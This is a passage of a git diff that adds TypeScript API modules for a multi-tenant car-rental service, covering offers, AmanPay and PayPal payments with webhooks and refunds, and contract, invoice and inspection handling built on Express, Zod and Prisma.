: undefined, + }, + }) + if (vehicleIds !== undefined) { + await tx.offerVehicle.deleteMany({ where: { offerId: id } }) + if (vehicleIds.length > 0) { + await tx.offerVehicle.createMany({ data: vehicleIds.map((vehicleId) => ({ offerId: id, vehicleId })) }) + } + } + return tx.offer.findUniqueOrThrow({ where: { id }, include: { vehicles: true } }) + }) +} + +export function deleteMany(id: string, companyId: string) { + return prisma.offer.deleteMany({ where: { id, companyId } }) +} + +export function setActive(id: string, companyId: string, isActive: boolean) { + return prisma.offer.updateMany({ where: { id, companyId }, data: { isActive } }) +} + +export async function getStats(id: string, companyId: string) { + const offer = await prisma.offer.findFirstOrThrow({ where: { id, companyId } }) + const reservations = await prisma.reservation.count({ where: { offerId: offer.id } }) + return { redemptions: offer.redemptionCount, reservations } +} diff --git a/apps/api/src/modules/offers/offer.routes.ts b/apps/api/src/modules/offers/offer.routes.ts new file mode 100644 index 0000000..598ff6f --- /dev/null +++ b/apps/api/src/modules/offers/offer.routes.ts @@ -0,0 +1,75 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseBody, parseQuery, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import * as service from './offer.service' +import { offerSchema, listQuerySchema, idParamSchema } from './offer.schemas' + +const router = Router() + +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/', async (req, res, next) => { + try { + const query = parseQuery(listQuerySchema, req) + ok(res, { data: await service.listOffers(req.companyId, query) }) + } catch (err) { next(err) } +}) + +router.post('/', requireRole('MANAGER'), async (req, res, next) => { + try { + const { vehicleIds, ...body } = parseBody(offerSchema, req) + created(res, { data: await service.createOffer(req.companyId, body, vehicleIds) }) + } catch (err) { next(err) } +}) + +router.get('/:id', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.getOffer(id, req.companyId) }) + } catch (err) { next(err) } +}) + +router.patch('/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + const { vehicleIds, ...body } = parseBody(offerSchema.partial(), req) + ok(res, { data: await service.updateOffer(id, req.companyId, body, vehicleIds) }) + } catch (err) { next(err) } +}) + +router.delete('/:id', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.deleteOffer(id, req.companyId) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.post('/:id/activate', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.setOfferActive(id, req.companyId, true) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.post('/:id/deactivate', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + await service.setOfferActive(id, req.companyId, false) + ok(res, { data: { success: true } }) + } catch (err) { next(err) } +}) + +router.get('/:id/stats', async (req, res, next) => { + try { + const { id } = parseParams(idParamSchema, req) + ok(res, { data: await service.getOfferStats(id, req.companyId) }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/offers/offer.schemas.ts b/apps/api/src/modules/offers/offer.schemas.ts new file mode 100644 index 0000000..99a8bd4 --- /dev/null +++ b/apps/api/src/modules/offers/offer.schemas.ts @@ -0,0 +1,31 @@ +import { z } from 'zod' + +export const offerSchema = z.object({ + title: z.string().min(1), + description: z.string().optional(), + termsAndConds: z.string().optional(), + type: z.enum(['PERCENTAGE', 'FIXED_AMOUNT', 'FREE_DAY', 'SPECIAL_RATE']), + discountValue: z.number().int().min(0), + specialRate: z.number().int().optional(), + appliesToAll: z.boolean().default(true), + categories: z.array(z.enum(['ECONOMY', 'COMPACT', 'MIDSIZE', 'FULLSIZE', 'SUV', 'LUXURY', 'VAN', 'TRUCK'])).default([]), + minRentalDays: z.number().int().optional(), + maxRentalDays: z.number().int().optional(), + promoCode: z.string().optional(), + maxRedemptions: z.number().int().optional(), + validFrom: z.string().datetime(), + validUntil: z.string().datetime(), + isActive: z.boolean().default(true), + isPublic: z.boolean().default(true), + isFeatured: z.boolean().default(false), + vehicleIds: z.array(z.string()).default([]), +}) + +export const listQuerySchema = z.object({ + active: z.string().optional(), + public: z.string().optional(), +}) + +export const idParamSchema = z.object({ + id: z.string().min(1), +}) diff --git a/apps/api/src/modules/offers/offer.service.ts b/apps/api/src/modules/offers/offer.service.ts new file mode 100644 index 0000000..3f6ccc0 --- /dev/null +++ b/apps/api/src/modules/offers/offer.service.ts @@ -0,0 +1,32 @@ +import { NotFoundError } from '../../http/errors' +import * as repo from './offer.repo' + +export function listOffers(companyId: string, filters: { active?: string; public?: string }) { + return repo.findMany(companyId, filters) +} + +export function getOffer(id: string, companyId: string) { + return repo.findByIdOrThrow(id, companyId) +} + +export function createOffer(companyId: string, data: any, vehicleIds: string[]) { + return repo.create(companyId, data, vehicleIds) +} + +export async function updateOffer(id: string, companyId: string, data: any, vehicleIds?: string[]) { + const existing = await repo.findFirst(id, companyId) + if (!existing) throw new NotFoundError('Offer not found') + return repo.update(id, data, vehicleIds) +} + +export function deleteOffer(id: string, companyId: string) { + return repo.deleteMany(id, companyId) +} + +export function setOfferActive(id: string, companyId: string, isActive: boolean) { + return repo.setActive(id, companyId, isActive) +} + +export function getOfferStats(id: string, companyId: string) { + return repo.getStats(id, companyId) +} diff --git a/apps/api/src/modules/payments/payment.repo.ts b/apps/api/src/modules/payments/payment.repo.ts new file mode 100644 index 0000000..b40514c --- /dev/null +++ b/apps/api/src/modules/payments/payment.repo.ts @@ -0,0 +1,77 @@ +import { prisma } from '../../lib/prisma' + +export function findByCompany(companyId: string) { + return prisma.rentalPayment.findMany({ + where: { companyId }, + include: { reservation: { include: { customer: true, vehicle: true } } }, + orderBy: { createdAt: 'desc' }, + take: 100, + }) +} + +export function findByReservation(reservationId: string, companyId: string) { + return prisma.rentalPayment.findMany({ where: { reservationId, companyId }, orderBy: { createdAt: 'desc' } }) +} + +export function findByAmanpay(transactionId: string) { + return prisma.rentalPayment.findFirst({ where: { amanpayTransactionId: transactionId } }) +} + +export function findByPaypal(captureId: string) { + return prisma.rentalPayment.findFirst({ where: { paypalCaptureId: captureId } }) +} + +export function findByPaypalForCompany(paypalOrderId: string, companyId: string) { + return prisma.rentalPayment.findFirstOrThrow({ where: { paypalCaptureId: paypalOrderId, companyId } }) +} + +export function findPaymentOrThrow(paymentId: string, companyId: string, reservationId: string) { + return prisma.rentalPayment.findFirstOrThrow({ where: { id: paymentId, companyId, reservationId } }) +} + +export function findReservationOrThrow(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id, companyId }, + include: { vehicle: true, customer: true }, + }) +} + +export function findReservation(id: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ where: { id, companyId } }) +} + +export function markPaymentSucceeded(id: string) { + return prisma.rentalPayment.update({ where: { id }, data: { status: 'SUCCEEDED', paidAt: new Date() } }) +} + +export function markPaymentFailed(query: { amanpayTransactionId?: string; paypalCaptureId?: string }) { + return prisma.rentalPayment.updateMany({ where: query, data: { status: 'FAILED' } }) +} + +export function incrementReservationPaid(reservationId: string, amount: number) { + return prisma.reservation.update({ where: { id: reservationId }, data: { paymentStatus: 'PAID', paidAmount: { increment: amount } } }) +} + +export function createPayment(data: { + companyId: string; reservationId: string; amount: number; currency: string + status: string; type: string; paymentProvider: string + amanpayTransactionId?: string | null; paypalCaptureId?: string | null; paymentMethod?: string; paidAt?: Date +}) { + return prisma.rentalPayment.create({ data: data as any }) +} + +export function updatePaypalCapture(id: string, captureId: string) { + return prisma.rentalPayment.update({ where: { id }, data: { status: 'SUCCEEDED', paidAt: new Date(), paypalCaptureId: captureId } }) +} + +export function setReservationPaidAmount(reservationId: string, paidAmount: number, paymentStatus: string) { + return prisma.reservation.update({ where: { id: reservationId }, data: { paidAmount, paymentStatus: paymentStatus as any } }) +} + +export function setReservationRefunded(reservationId: string) { + return prisma.reservation.update({ where: { id: reservationId }, data: { paymentStatus: 'REFUNDED' } }) +} + +export function setPaymentRefunded(id: string, partial: boolean) { + return prisma.rentalPayment.update({ where: { id }, data: { status: partial ? 'PARTIALLY_REFUNDED' : 'REFUNDED' } }) +} diff --git a/apps/api/src/modules/payments/payment.routes.ts b/apps/api/src/modules/payments/payment.routes.ts new file mode 100644 index 0000000..cb330d3 --- /dev/null +++ b/apps/api/src/modules/payments/payment.routes.ts @@ -0,0 +1,88 @@ +import { Router } from 'express' +import { requireCompanyAuth } from '../../middleware/requireCompanyAuth' +import { requireTenant } from '../../middleware/requireTenant' +import { requireSubscription } from '../../middleware/requireSubscription' +import { requireRole } from '../../middleware/requireRole' +import { parseBody, parseParams } from '../../http/validate' +import { ok } from '../../http/respond' +import * as amanpay from '../../services/amanpayService' +import * as paypal from '../../services/paypalService' +import * as service from './payment.service' +import { chargeSchema, manualPaymentSchema, refundSchema, capturePaypalSchema, reservationParamSchema, paymentParamSchema } from './payment.schemas' + +const router = Router() + +// ─── Webhooks (no auth) ──────────────────────────────────────── + +router.post('/webhooks/amanpay', async (req, res, next) => { + try { + const rawBody = JSON.stringify(req.body) + const signature = (req.headers['x-amanpay-signature'] as string) ?? '' + if (amanpay.isConfigured() && !amanpay.verifyWebhookSignature(rawBody, signature)) { + return res.status(401).json({ error: 'invalid_signature' }) + } + await service.handleAmanpayWebhook(req.body) + res.json({ received: true }) + } catch (err) { next(err) } +}) + +router.post('/webhooks/paypal', async (req, res, next) => { + try { + const rawBody = JSON.stringify(req.body) + const isValid = await paypal.verifyWebhookEvent(req.headers as Record, rawBody) + if (paypal.isConfigured() && !isValid) return res.status(401).json({ error: 'invalid_signature' }) + await service.handlePaypalWebhook(req.body) + res.json({ received: true }) + } catch (err) { next(err) } +}) + +// ─── Authenticated ──────────────────────────────────────────── + +router.use(requireCompanyAuth, requireTenant, requireSubscription) + +router.get('/company', async (req, res, next) => { + try { + ok(res, { data: await service.listByCompany(req.companyId) }) + } catch (err) { next(err) } +}) + +router.get('/reservations/:id', async (req, res, next) => { + try { + const { id } = parseParams(reservationParamSchema, req) + ok(res, { data: await service.listByReservation(id, req.companyId) }) + } catch (err) { next(err) } +}) + +router.post('/reservations/:id/charge', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(reservationParamSchema, req) + const body = parseBody(chargeSchema, req) + ok(res, { data: await service.initCharge(id, req.companyId, body) }) + } catch (err) { next(err) } +}) + +router.post('/reservations/:id/capture-paypal', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(reservationParamSchema, req) + const { paypalOrderId } = parseBody(capturePaypalSchema, req) + ok(res, { data: await service.capturePaypal(id, req.companyId, paypalOrderId) }) + } catch (err) { next(err) } +}) + +router.post('/reservations/:id/manual', requireRole('MANAGER'), async (req, res, next) => { + try { + const { id } = parseParams(reservationParamSchema, req) + const body = parseBody(manualPaymentSchema, req) + ok(res, { data: await service.recordManualPayment(id, req.companyId, body) }) + } catch (err) { next(err) } +}) + +router.post('/reservations/:reservationId/payments/:paymentId/refund', requireRole('MANAGER'), async (req, res, next) => { + try { + const { reservationId, paymentId } = parseParams(paymentParamSchema, req) + const { amount, reason } = parseBody(refundSchema, req) + ok(res, { data: await service.refundPayment(reservationId, paymentId, req.companyId, amount, reason) }) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/payments/payment.schemas.ts b/apps/api/src/modules/payments/payment.schemas.ts new file mode 100644 index 0000000..acb0fed --- /dev/null +++ b/apps/api/src/modules/payments/payment.schemas.ts @@ -0,0 +1,34 @@ +import { z } from 'zod' + +export const chargeSchema = z.object({ + provider: z.enum(['AMANPAY', 'PAYPAL']), + type: z.enum(['CHARGE', 'DEPOSIT']).default('CHARGE'), + currency: z.enum(['MAD', 'USD', 'EUR']).default('MAD'), + successUrl: z.string().url(), + failureUrl: z.string().url(), +}) + +export const manualPaymentSchema = z.object({ + amount: z.number().int().positive(), + currency: z.enum(['MAD', 'USD', 'EUR']).default('MAD'), + type: z.enum(['CHARGE', 'DEPOSIT']).default('CHARGE'), + paymentMethod: z.enum(['CASH', 'CHECK', 'BANK_TRANSFER', 'CARD', 'PAYPAL']), +}) + +export const refundSchema = z.object({ + amount: z.number().int().positive().optional(), + reason: z.string().optional(), +}) + +export const capturePaypalSchema = z.object({ + paypalOrderId: z.string(), +}) + +export const reservationParamSchema = z.object({ + id: z.string().min(1), +}) + +export const paymentParamSchema = z.object({ + reservationId: z.string().min(1), + paymentId: z.string().min(1), +}) diff --git a/apps/api/src/modules/payments/payment.service.ts b/apps/api/src/modules/payments/payment.service.ts new file mode 100644 index 0000000..6a45121 --- /dev/null +++ b/apps/api/src/modules/payments/payment.service.ts @@ -0,0 +1,121 @@ +import { ConflictError, ValidationError } from '../../http/errors' +import * as amanpay from '../../services/amanpayService' +import * as paypal from '../../services/paypalService' +import * as repo from './payment.repo' + +export function listByCompany(companyId: string) { + return repo.findByCompany(companyId) +} + +export function listByReservation(reservationId: string, companyId: string) { + return repo.findByReservation(reservationId, companyId) +} + +export async function handleAmanpayWebhook(event: any) { + const transactionId = event.transaction_id ?? event.id + const status = event.status?.toUpperCase() + if (status === 'PAID' || status === 'SUCCEEDED') { + const payment = await repo.findByAmanpay(transactionId) + if (payment) { + await repo.markPaymentSucceeded(payment.id) + await repo.incrementReservationPaid(payment.reservationId, payment.amount) + } + } else if (status === 'FAILED') { + await repo.markPaymentFailed({ amanpayTransactionId: transactionId }) + } +} + +export async function handlePaypalWebhook(event: any) { + const eventType = event.event_type as string + if (eventType === 'PAYMENT.CAPTURE.COMPLETED') { + const captureId = event.resource?.id as string + const payment = await repo.findByPaypal(captureId) + if (payment) { + await repo.markPaymentSucceeded(payment.id) + await repo.incrementReservationPaid(payment.reservationId, payment.amount) + } + } else if (eventType === 'PAYMENT.CAPTURE.DENIED') { + await repo.markPaymentFailed({ paypalCaptureId: event.resource?.id }) + } +} + +export async function initCharge(reservationId: string, companyId: string, body: { + provider: 'AMANPAY' | 'PAYPAL'; type: 'CHARGE' | 'DEPOSIT' + currency: 'MAD' | 'USD' | 'EUR'; successUrl: string; failureUrl: string +}) { + const reservation = await repo.findReservationOrThrow(reservationId, companyId) + if (reservation.paymentStatus === 'PAID') throw new ConflictError('Reservation is already fully paid') + + const amount = body.type === 'DEPOSIT' ? reservation.depositAmount : reservation.totalAmount + const description = `${body.type === 'DEPOSIT' ? 'Deposit' : 'Rental'}: ${reservation.vehicle.make} ${reservation.vehicle.model}` + const orderId = `${reservationId}-${body.type}-${Date.now()}` + const webhookBase = process.env.API_URL ?? 'http://localhost:4000' + + let checkoutUrl: string + let amanpayTransactionId: string | null = null + let paypalCaptureId: string | null = null + + if (body.provider === 'AMANPAY') { + if (!amanpay.isConfigured()) throw new ValidationError('AmanPay is not configured') + const result = await amanpay.createCheckout({ + amount, currency: body.currency, orderId, description, + customerEmail: reservation.customer.email, + customerName: `${reservation.customer.firstName} ${reservation.customer.lastName}`, + successUrl: body.successUrl, failureUrl: body.failureUrl, + webhookUrl: `${webhookBase}/api/v1/payments/webhooks/amanpay`, + }) + checkoutUrl = result.checkoutUrl + amanpayTransactionId = result.transactionId + } else { + if (!paypal.isConfigured()) throw new ValidationError('PayPal is not configured') + const result = await paypal.createOrder({ amount, currency: body.currency, orderId, description, returnUrl: body.successUrl, cancelUrl: body.failureUrl }) + checkoutUrl = result.approveUrl + paypalCaptureId = result.orderId + } + + const payment = await repo.createPayment({ companyId, reservationId, amount, currency: body.currency, status: 'PENDING', type: body.type, paymentProvider: body.provider, amanpayTransactionId, paypalCaptureId }) + return { payment, checkoutUrl } +} + +export async function capturePaypal(reservationId: string, companyId: string, paypalOrderId: string) { + const payment = await repo.findByPaypalForCompany(paypalOrderId, companyId) + const capture = await paypal.captureOrder(paypalOrderId) as Record + const captureId = capture.purchase_units?.[0]?.payments?.captures?.[0]?.id ?? paypalOrderId + const updated = await repo.updatePaypalCapture(payment.id, captureId) + await repo.incrementReservationPaid(payment.reservationId, payment.amount) + return updated +} + +export async function recordManualPayment(reservationId: string, companyId: string, body: { + amount: number; currency: string; type: string; paymentMethod: string +}) { + const reservation = await repo.findReservation(reservationId, companyId) + const remaining = Math.max(reservation.totalAmount - reservation.paidAmount, 0) + if (remaining <= 0) throw new ConflictError('Reservation is already fully paid') + if (body.amount > remaining) throw new ValidationError('Payment amount exceeds remaining balance') + + const payment = await repo.createPayment({ companyId, reservationId, amount: body.amount, currency: body.currency, status: 'SUCCEEDED', type: body.type, paymentProvider: body.paymentMethod === 'PAYPAL' ? 'PAYPAL' : 'AMANPAY', paymentMethod: body.paymentMethod, paidAt: new Date() }) + const newPaidAmount = reservation.paidAmount + body.amount + await repo.setReservationPaidAmount(reservationId, newPaidAmount, newPaidAmount >= reservation.totalAmount ? 'PAID' : 'PARTIAL') + return payment +} + +export async function refundPayment(reservationId: string, paymentId: string, companyId: string, amount?: number, reason?: string) { + const payment = await repo.findPaymentOrThrow(paymentId, companyId, reservationId) + if (payment.status !== 'SUCCEEDED') throw new ValidationError('Only succeeded payments can be refunded') + if (!payment.amanpayTransactionId && !payment.paypalCaptureId) throw new ValidationError('Manual payments must be refunded outside the online gateway flow') + + const refundAmount = amount ?? payment.amount + if (payment.paymentProvider === 'AMANPAY') { + if (!payment.amanpayTransactionId) throw new Error('No AmanPay transaction ID') + await amanpay.refundTransaction(payment.amanpayTransactionId, refundAmount, reason) + } else { + if (!payment.paypalCaptureId) throw new Error('No PayPal capture ID') + await paypal.refundCapture(payment.paypalCaptureId, refundAmount, payment.currency, reason) + } + + const isPartial = refundAmount < payment.amount + const updated = await repo.setPaymentRefunded(payment.id, isPartial) + if (!isPartial) await repo.setReservationRefunded(payment.reservationId) + return updated +} diff --git a/apps/api/src/modules/reservations/reservation.additional-driver.service.ts b/apps/api/src/modules/reservations/reservation.additional-driver.service.ts new file mode 100644 index 0000000..84f0139 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.additional-driver.service.ts @@ -0,0 +1,19 @@ +export { applyAdditionalDriversToReservation, calculateAdditionalDriverCharge } from '../../services/additionalDriverService' + +import * as repo from './reservation.repo' + +export async function approveAdditionalDriver( + reservationId: string, + driverId: string, + companyId: string, + approved: boolean, + note: string | undefined, + approvedBy: string, +) { + const driver = await repo.findAdditionalDriver(driverId, reservationId, companyId) + return repo.updateAdditionalDriver(driver.id, { + approvedAt: approved ? new Date() : null, + approvedBy: approved ? approvedBy : null, + approvalNote: note ?? driver.approvalNote, + }) +} diff --git a/apps/api/src/modules/reservations/reservation.document.service.ts b/apps/api/src/modules/reservations/reservation.document.service.ts new file mode 100644 index 0000000..a21ea08 --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.document.service.ts @@ -0,0 +1,263 @@ +import { prisma } from '../../lib/prisma' +import * as repo from './reservation.repo' + +export function formatDocumentNumber(prefix: string, sequence: number): string { + return `${prefix}-${String(sequence).padStart(6, '0')}` +} + +export async function ensureReservationDocumentNumbers(companyId: string, reservationId: string) { + return prisma.$transaction(async (tx) => { + const reservation = await tx.reservation.findFirstOrThrow({ + where: { id: reservationId, companyId }, + select: { id: true, contractNumber: true, invoiceNumber: true }, + }) + if (reservation.contractNumber && reservation.invoiceNumber) return reservation + + const settings = await tx.contractSettings.upsert({ + where: { companyId }, + update: {}, + create: { companyId }, + }) + + const data: { contractNumber?: string; invoiceNumber?: string } = {} + const settingsUpdate: { lastContractSeq?: number; lastInvoiceSeq?: number } = {} + + if (!reservation.contractNumber) { + const nextSeq = settings.lastContractSeq + 1 + data.contractNumber = formatDocumentNumber(settings.contractPrefix, nextSeq) + settingsUpdate.lastContractSeq = nextSeq + } + if (!reservation.invoiceNumber) { + const nextSeq = settings.lastInvoiceSeq + 1 + data.invoiceNumber = formatDocumentNumber(settings.invoicePrefix, nextSeq) + settingsUpdate.lastInvoiceSeq = nextSeq + } + + if (Object.keys(settingsUpdate).length > 0) { + await tx.contractSettings.update({ where: { companyId }, data: settingsUpdate }) + } + + return tx.reservation.update({ + where: { id: reservationId }, + data, + select: { id: true, contractNumber: true, invoiceNumber: true }, + }) + }) +} + +export function buildReservationInvoiceLineItems(reservation: { + dailyRate: number + totalDays: number + discountAmount: number + depositAmount: number + pricingRulesApplied: Array<{ name?: string; amount?: number; type?: string }> | null + insurances: Array<{ id: string; policyName: string; chargeType: string; chargeValue: number; totalCharge: number }> + additionalDrivers: Array<{ id: string; firstName: string; lastName: string; totalCharge: number }> + vehicle: { year: number; make: string; model: string } +}) { + const baseAmount = reservation.dailyRate * reservation.totalDays + return [ + { + description: `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model}`, + qty: reservation.totalDays, + unitPrice: reservation.dailyRate, + total: baseAmount, + category: 'RENTAL', + }, + ...reservation.insurances.map((ins) => ({ + description: ins.policyName, + qty: ins.chargeType === 'PER_DAY' ? reservation.totalDays : 1, + unitPrice: ins.chargeType === 'PER_DAY' ? ins.chargeValue : ins.totalCharge, + total: ins.totalCharge, + category: 'INSURANCE', + })), + ...reservation.additionalDrivers + .filter((d) => d.totalCharge > 0) + .map((d) => ({ + description: `Additional driver - ${d.firstName} ${d.lastName}`, + qty: 1, + unitPrice: d.totalCharge, + total: d.totalCharge, + category: 'ADDITIONAL_DRIVER', + })), + ...((reservation.pricingRulesApplied ?? []).map((rule, i) => ({ + description: rule.name?.trim() || `Pricing adjustment ${i + 1}`, + qty: 1, + unitPrice: Number(rule.amount ?? 0), + total: Number(rule.amount ?? 0), + category: 'PRICING_RULE', + }))), + ...(reservation.discountAmount > 0 ? [{ + description: 'Discount', + qty: 1, + unitPrice: -reservation.discountAmount, + total: -reservation.discountAmount, + category: 'DISCOUNT', + }] : []), + ...(reservation.depositAmount > 0 ? [{ + description: 'Security deposit', + qty: 1, + unitPrice: reservation.depositAmount, + total: reservation.depositAmount, + category: 'DEPOSIT', + }] : []), + ] +} + +export async function getContract(id: string, companyId: string) { + await ensureReservationDocumentNumbers(companyId, id) + + const reservation = await repo.findForContract(id, companyId) + const contractSettings = reservation.company.contractSettings ?? await prisma.contractSettings.upsert({ + where: { companyId }, + update: {}, + create: { companyId }, + }) + + const extras = reservation.extras && typeof reservation.extras === 'object' && !Array.isArray(reservation.extras) + ? (reservation.extras as Record) + : {} + + const invoiceLineItems = buildReservationInvoiceLineItems({ + dailyRate: reservation.dailyRate, + totalDays: reservation.totalDays, + discountAmount: reservation.discountAmount, + depositAmount: reservation.depositAmount, + pricingRulesApplied: Array.isArray(reservation.pricingRulesApplied) + ? (reservation.pricingRulesApplied as any) + : [], + insurances: reservation.insurances, + additionalDrivers: reservation.additionalDrivers, + vehicle: reservation.vehicle, + }) + + const subtotal = invoiceLineItems.reduce((s, i) => s + i.total, 0) + const taxes = contractSettings.showTax && contractSettings.taxRate + ? [{ label: contractSettings.taxLabel?.trim() || 'Tax', rate: contractSettings.taxRate, amount: Math.round(subtotal * contractSettings.taxRate / 100) }] + : [] + const taxTotal = taxes.reduce((s, t) => s + t.amount, 0) + const grandTotal = subtotal + taxTotal + const amountPaid = reservation.rentalPayments + .filter((p: any) => p.status === 'SUCCEEDED') + .reduce((s: number, p: any) => s + p.amount, 0) + + const checkInInspection = reservation.inspections.find((i: any) => i.type === 'CHECKIN') ?? null + const checkOutInspection = reservation.inspections.find((i: any) => i.type === 'CHECKOUT') ?? null + + return { + reservationId: reservation.id, + contractLocale: reservation.company.brand?.defaultLocale ?? 'en', + contractNumber: reservation.contractNumber, + invoiceNumber: reservation.invoiceNumber, + generatedAt: new Date().toISOString(), + status: reservation.status, + paymentStatus: reservation.paymentStatus, + paymentMode: typeof extras.paymentMode === 'string' ? extras.paymentMode : null, + notes: reservation.notes, + company: { + name: reservation.company.brand?.displayName ?? reservation.company.name, + legalName: contractSettings.legalName || reservation.company.name, + email: reservation.company.brand?.publicEmail ?? reservation.company.email, + phone: reservation.company.brand?.publicPhone ?? reservation.company.phone, + address: reservation.company.brand?.publicAddress ?? reservation.company.address ?? null, + city: reservation.company.brand?.publicCity ?? null, + country: reservation.company.brand?.publicCountry ?? null, + registrationNumber: contractSettings.registrationNumber, + taxId: contractSettings.taxId, + logoUrl: reservation.company.brand?.logoUrl ?? null, + }, + driver: { + firstName: reservation.customer.firstName, + lastName: reservation.customer.lastName, + email: reservation.customer.email, + phone: reservation.customer.phone, + dateOfBirth: reservation.customer.dateOfBirth, + driverLicense: reservation.customer.driverLicense, + licenseCountry: reservation.customer.licenseCountry, + licenseCategory: reservation.customer.licenseCategory, + licenseIssuedAt: reservation.customer.licenseIssuedAt, + licenseExpiry: reservation.customer.licenseExpiry, + nationality: reservation.customer.nationality, + }, + additionalDrivers: reservation.additionalDrivers.map((d: any) => ({ + id: d.id, firstName: d.firstName, lastName: d.lastName, + email: d.email, phone: d.phone, driverLicense: d.driverLicense, + licenseIssuedAt: d.licenseIssuedAt, licenseExpiry: d.licenseExpiry, + licenseCountry: d.nationality, dateOfBirth: d.dateOfBirth, totalCharge: d.totalCharge, + })), + vehicle: { + make: reservation.vehicle.make, model: reservation.vehicle.model, year: reservation.vehicle.year, + color: reservation.vehicle.color, licensePlate: reservation.vehicle.licensePlate, + vin: reservation.vehicle.vin, category: reservation.vehicle.category, + }, + rentalPeriod: { + startDate: reservation.startDate, endDate: reservation.endDate, totalDays: reservation.totalDays, + pickupLocation: reservation.pickupLocation, returnLocation: reservation.returnLocation, + }, + insurance: { + total: reservation.insuranceTotal, + policies: reservation.insurances.map((ins: any) => ({ + id: ins.id, name: ins.policyName, chargeType: ins.chargeType, + unitPrice: ins.chargeValue, totalCharge: ins.totalCharge, + })), + }, + inspections: { checkIn: checkInInspection, checkOut: checkOutInspection }, + terms: { + terms: contractSettings.terms, + fuelPolicy: contractSettings.fuelPolicy, + fuelPolicyType: contractSettings.fuelPolicyType, + depositPolicy: contractSettings.depositPolicy, + lateFeePolicy: contractSettings.lateFeePolicy, + damagePolicy: contractSettings.damagePolicy, + footerNote: contractSettings.contractFooterNote, + signatureRequired: contractSettings.signatureRequired, + }, + invoice: { + currency: reservation.company.accountingSettings?.currency ?? reservation.company.brand?.defaultCurrency ?? 'MAD', + lineItems: invoiceLineItems, + subtotal, taxes, taxTotal, total: grandTotal, amountPaid, + balanceDue: grandTotal - amountPaid, + payments: reservation.rentalPayments.map((p: any) => ({ + id: p.id, amount: p.amount, currency: p.currency, type: p.type, + status: p.status, provider: p.paymentProvider, + paymentMethod: p.paymentMethod, paidAt: p.paidAt, createdAt: p.createdAt, + })), + }, + } +} + +export async function getBilling(id: string, companyId: string) { + const reservation = await repo.findForBilling(id, companyId) + const baseAmount = reservation.dailyRate * reservation.totalDays + const lineItems = [ + { + description: `${reservation.vehicle.year} ${reservation.vehicle.make} ${reservation.vehicle.model} — ${reservation.totalDays} day(s)`, + qty: reservation.totalDays, unitPrice: reservation.dailyRate, total: baseAmount, category: 'RENTAL', + }, + ...reservation.insurances.map((ins: any) => ({ + description: ins.policyName, + qty: ins.chargeType === 'PER_DAY' ? reservation.totalDays : 1, + unitPrice: ins.chargeType === 'PER_DAY' ? ins.chargeValue : ins.totalCharge, + total: ins.totalCharge, category: 'INSURANCE', + })), + ...reservation.additionalDrivers + .filter((d: any) => d.totalCharge > 0) + .map((d: any) => ({ + description: `Additional Driver — ${d.firstName} ${d.lastName}`, + qty: 1, unitPrice: d.totalCharge, total: d.totalCharge, category: 'ADDITIONAL_DRIVER', + })), + ...(reservation.depositAmount > 0 ? [{ + description: 'Security Deposit (refundable)', + qty: 1, unitPrice: reservation.depositAmount, total: reservation.depositAmount, category: 'DEPOSIT', + }] : []), + ] + const grandTotal = lineItems.reduce((s, i) => s + i.total, 0) - reservation.discountAmount + + return { + lineItems, + discountAmount: reservation.discountAmount, + pricingRulesApplied: reservation.pricingRulesApplied, + pricingRulesTotal: reservation.pricingRulesTotal, + grandTotal, + } +} diff --git a/apps/api/src/modules/reservations/reservation.inspection.service.ts b/apps/api/src/modules/reservations/reservation.inspection.service.ts new file mode 100644 index 0000000..44ed65d --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.inspection.service.ts @@ -0,0 +1,103 @@ +import { prisma } from '../../lib/prisma' +import { AppError } from '../../http/errors' +import { buildReservationWorkflow } from './reservation.presenter' +import * as repo from './reservation.repo' + +export async function getInspections(reservationId: string, companyId: string) { + return repo.findInspections(reservationId, companyId) +} + +export async function upsertInspection( + reservationId: string, + companyId: string, + type: 'CHECKIN' | 'CHECKOUT', + body: { + mileage?: number + fuelLevel: string + fuelCharge?: number + generalCondition?: string + employeeNotes?: string + customerAgreed?: boolean + damagePoints?: Array<{ + viewType: string; x: number; y: number; damageType: string + severity?: string; description?: string; isPreExisting?: boolean + }> + }, + inspectedBy: string, +) { + const reservation = await repo.findForInspection(reservationId, companyId) + const workflow = buildReservationWorkflow(reservation) + + if (workflow.closed) throw new AppError('This reservation has already been closed', 400, 'reservation_closed') + if (type === 'CHECKIN' && !workflow.checkInInspectionEditable) { + throw new AppError('Check-in inspection is not editable at this stage', 400, 'invalid_status') + } + if (type === 'CHECKOUT' && !workflow.checkOutInspectionEditable) { + throw new AppError('Check-out inspection is only editable after the vehicle is returned', 400, 'invalid_status') + } + + const inspection = await prisma.damageInspection.upsert({ + where: { reservationId_type: { reservationId, type } }, + update: { + mileage: body.mileage ?? null, + fuelLevel: body.fuelLevel as any, + fuelCharge: body.fuelCharge ?? null, + generalCondition: body.generalCondition ?? null, + employeeNotes: body.employeeNotes ?? null, + customerAgreed: body.customerAgreed ?? false, + inspectedBy, + inspectedAt: new Date(), + damagePoints: { deleteMany: {}, create: body.damagePoints as any }, + }, + create: { + reservationId, 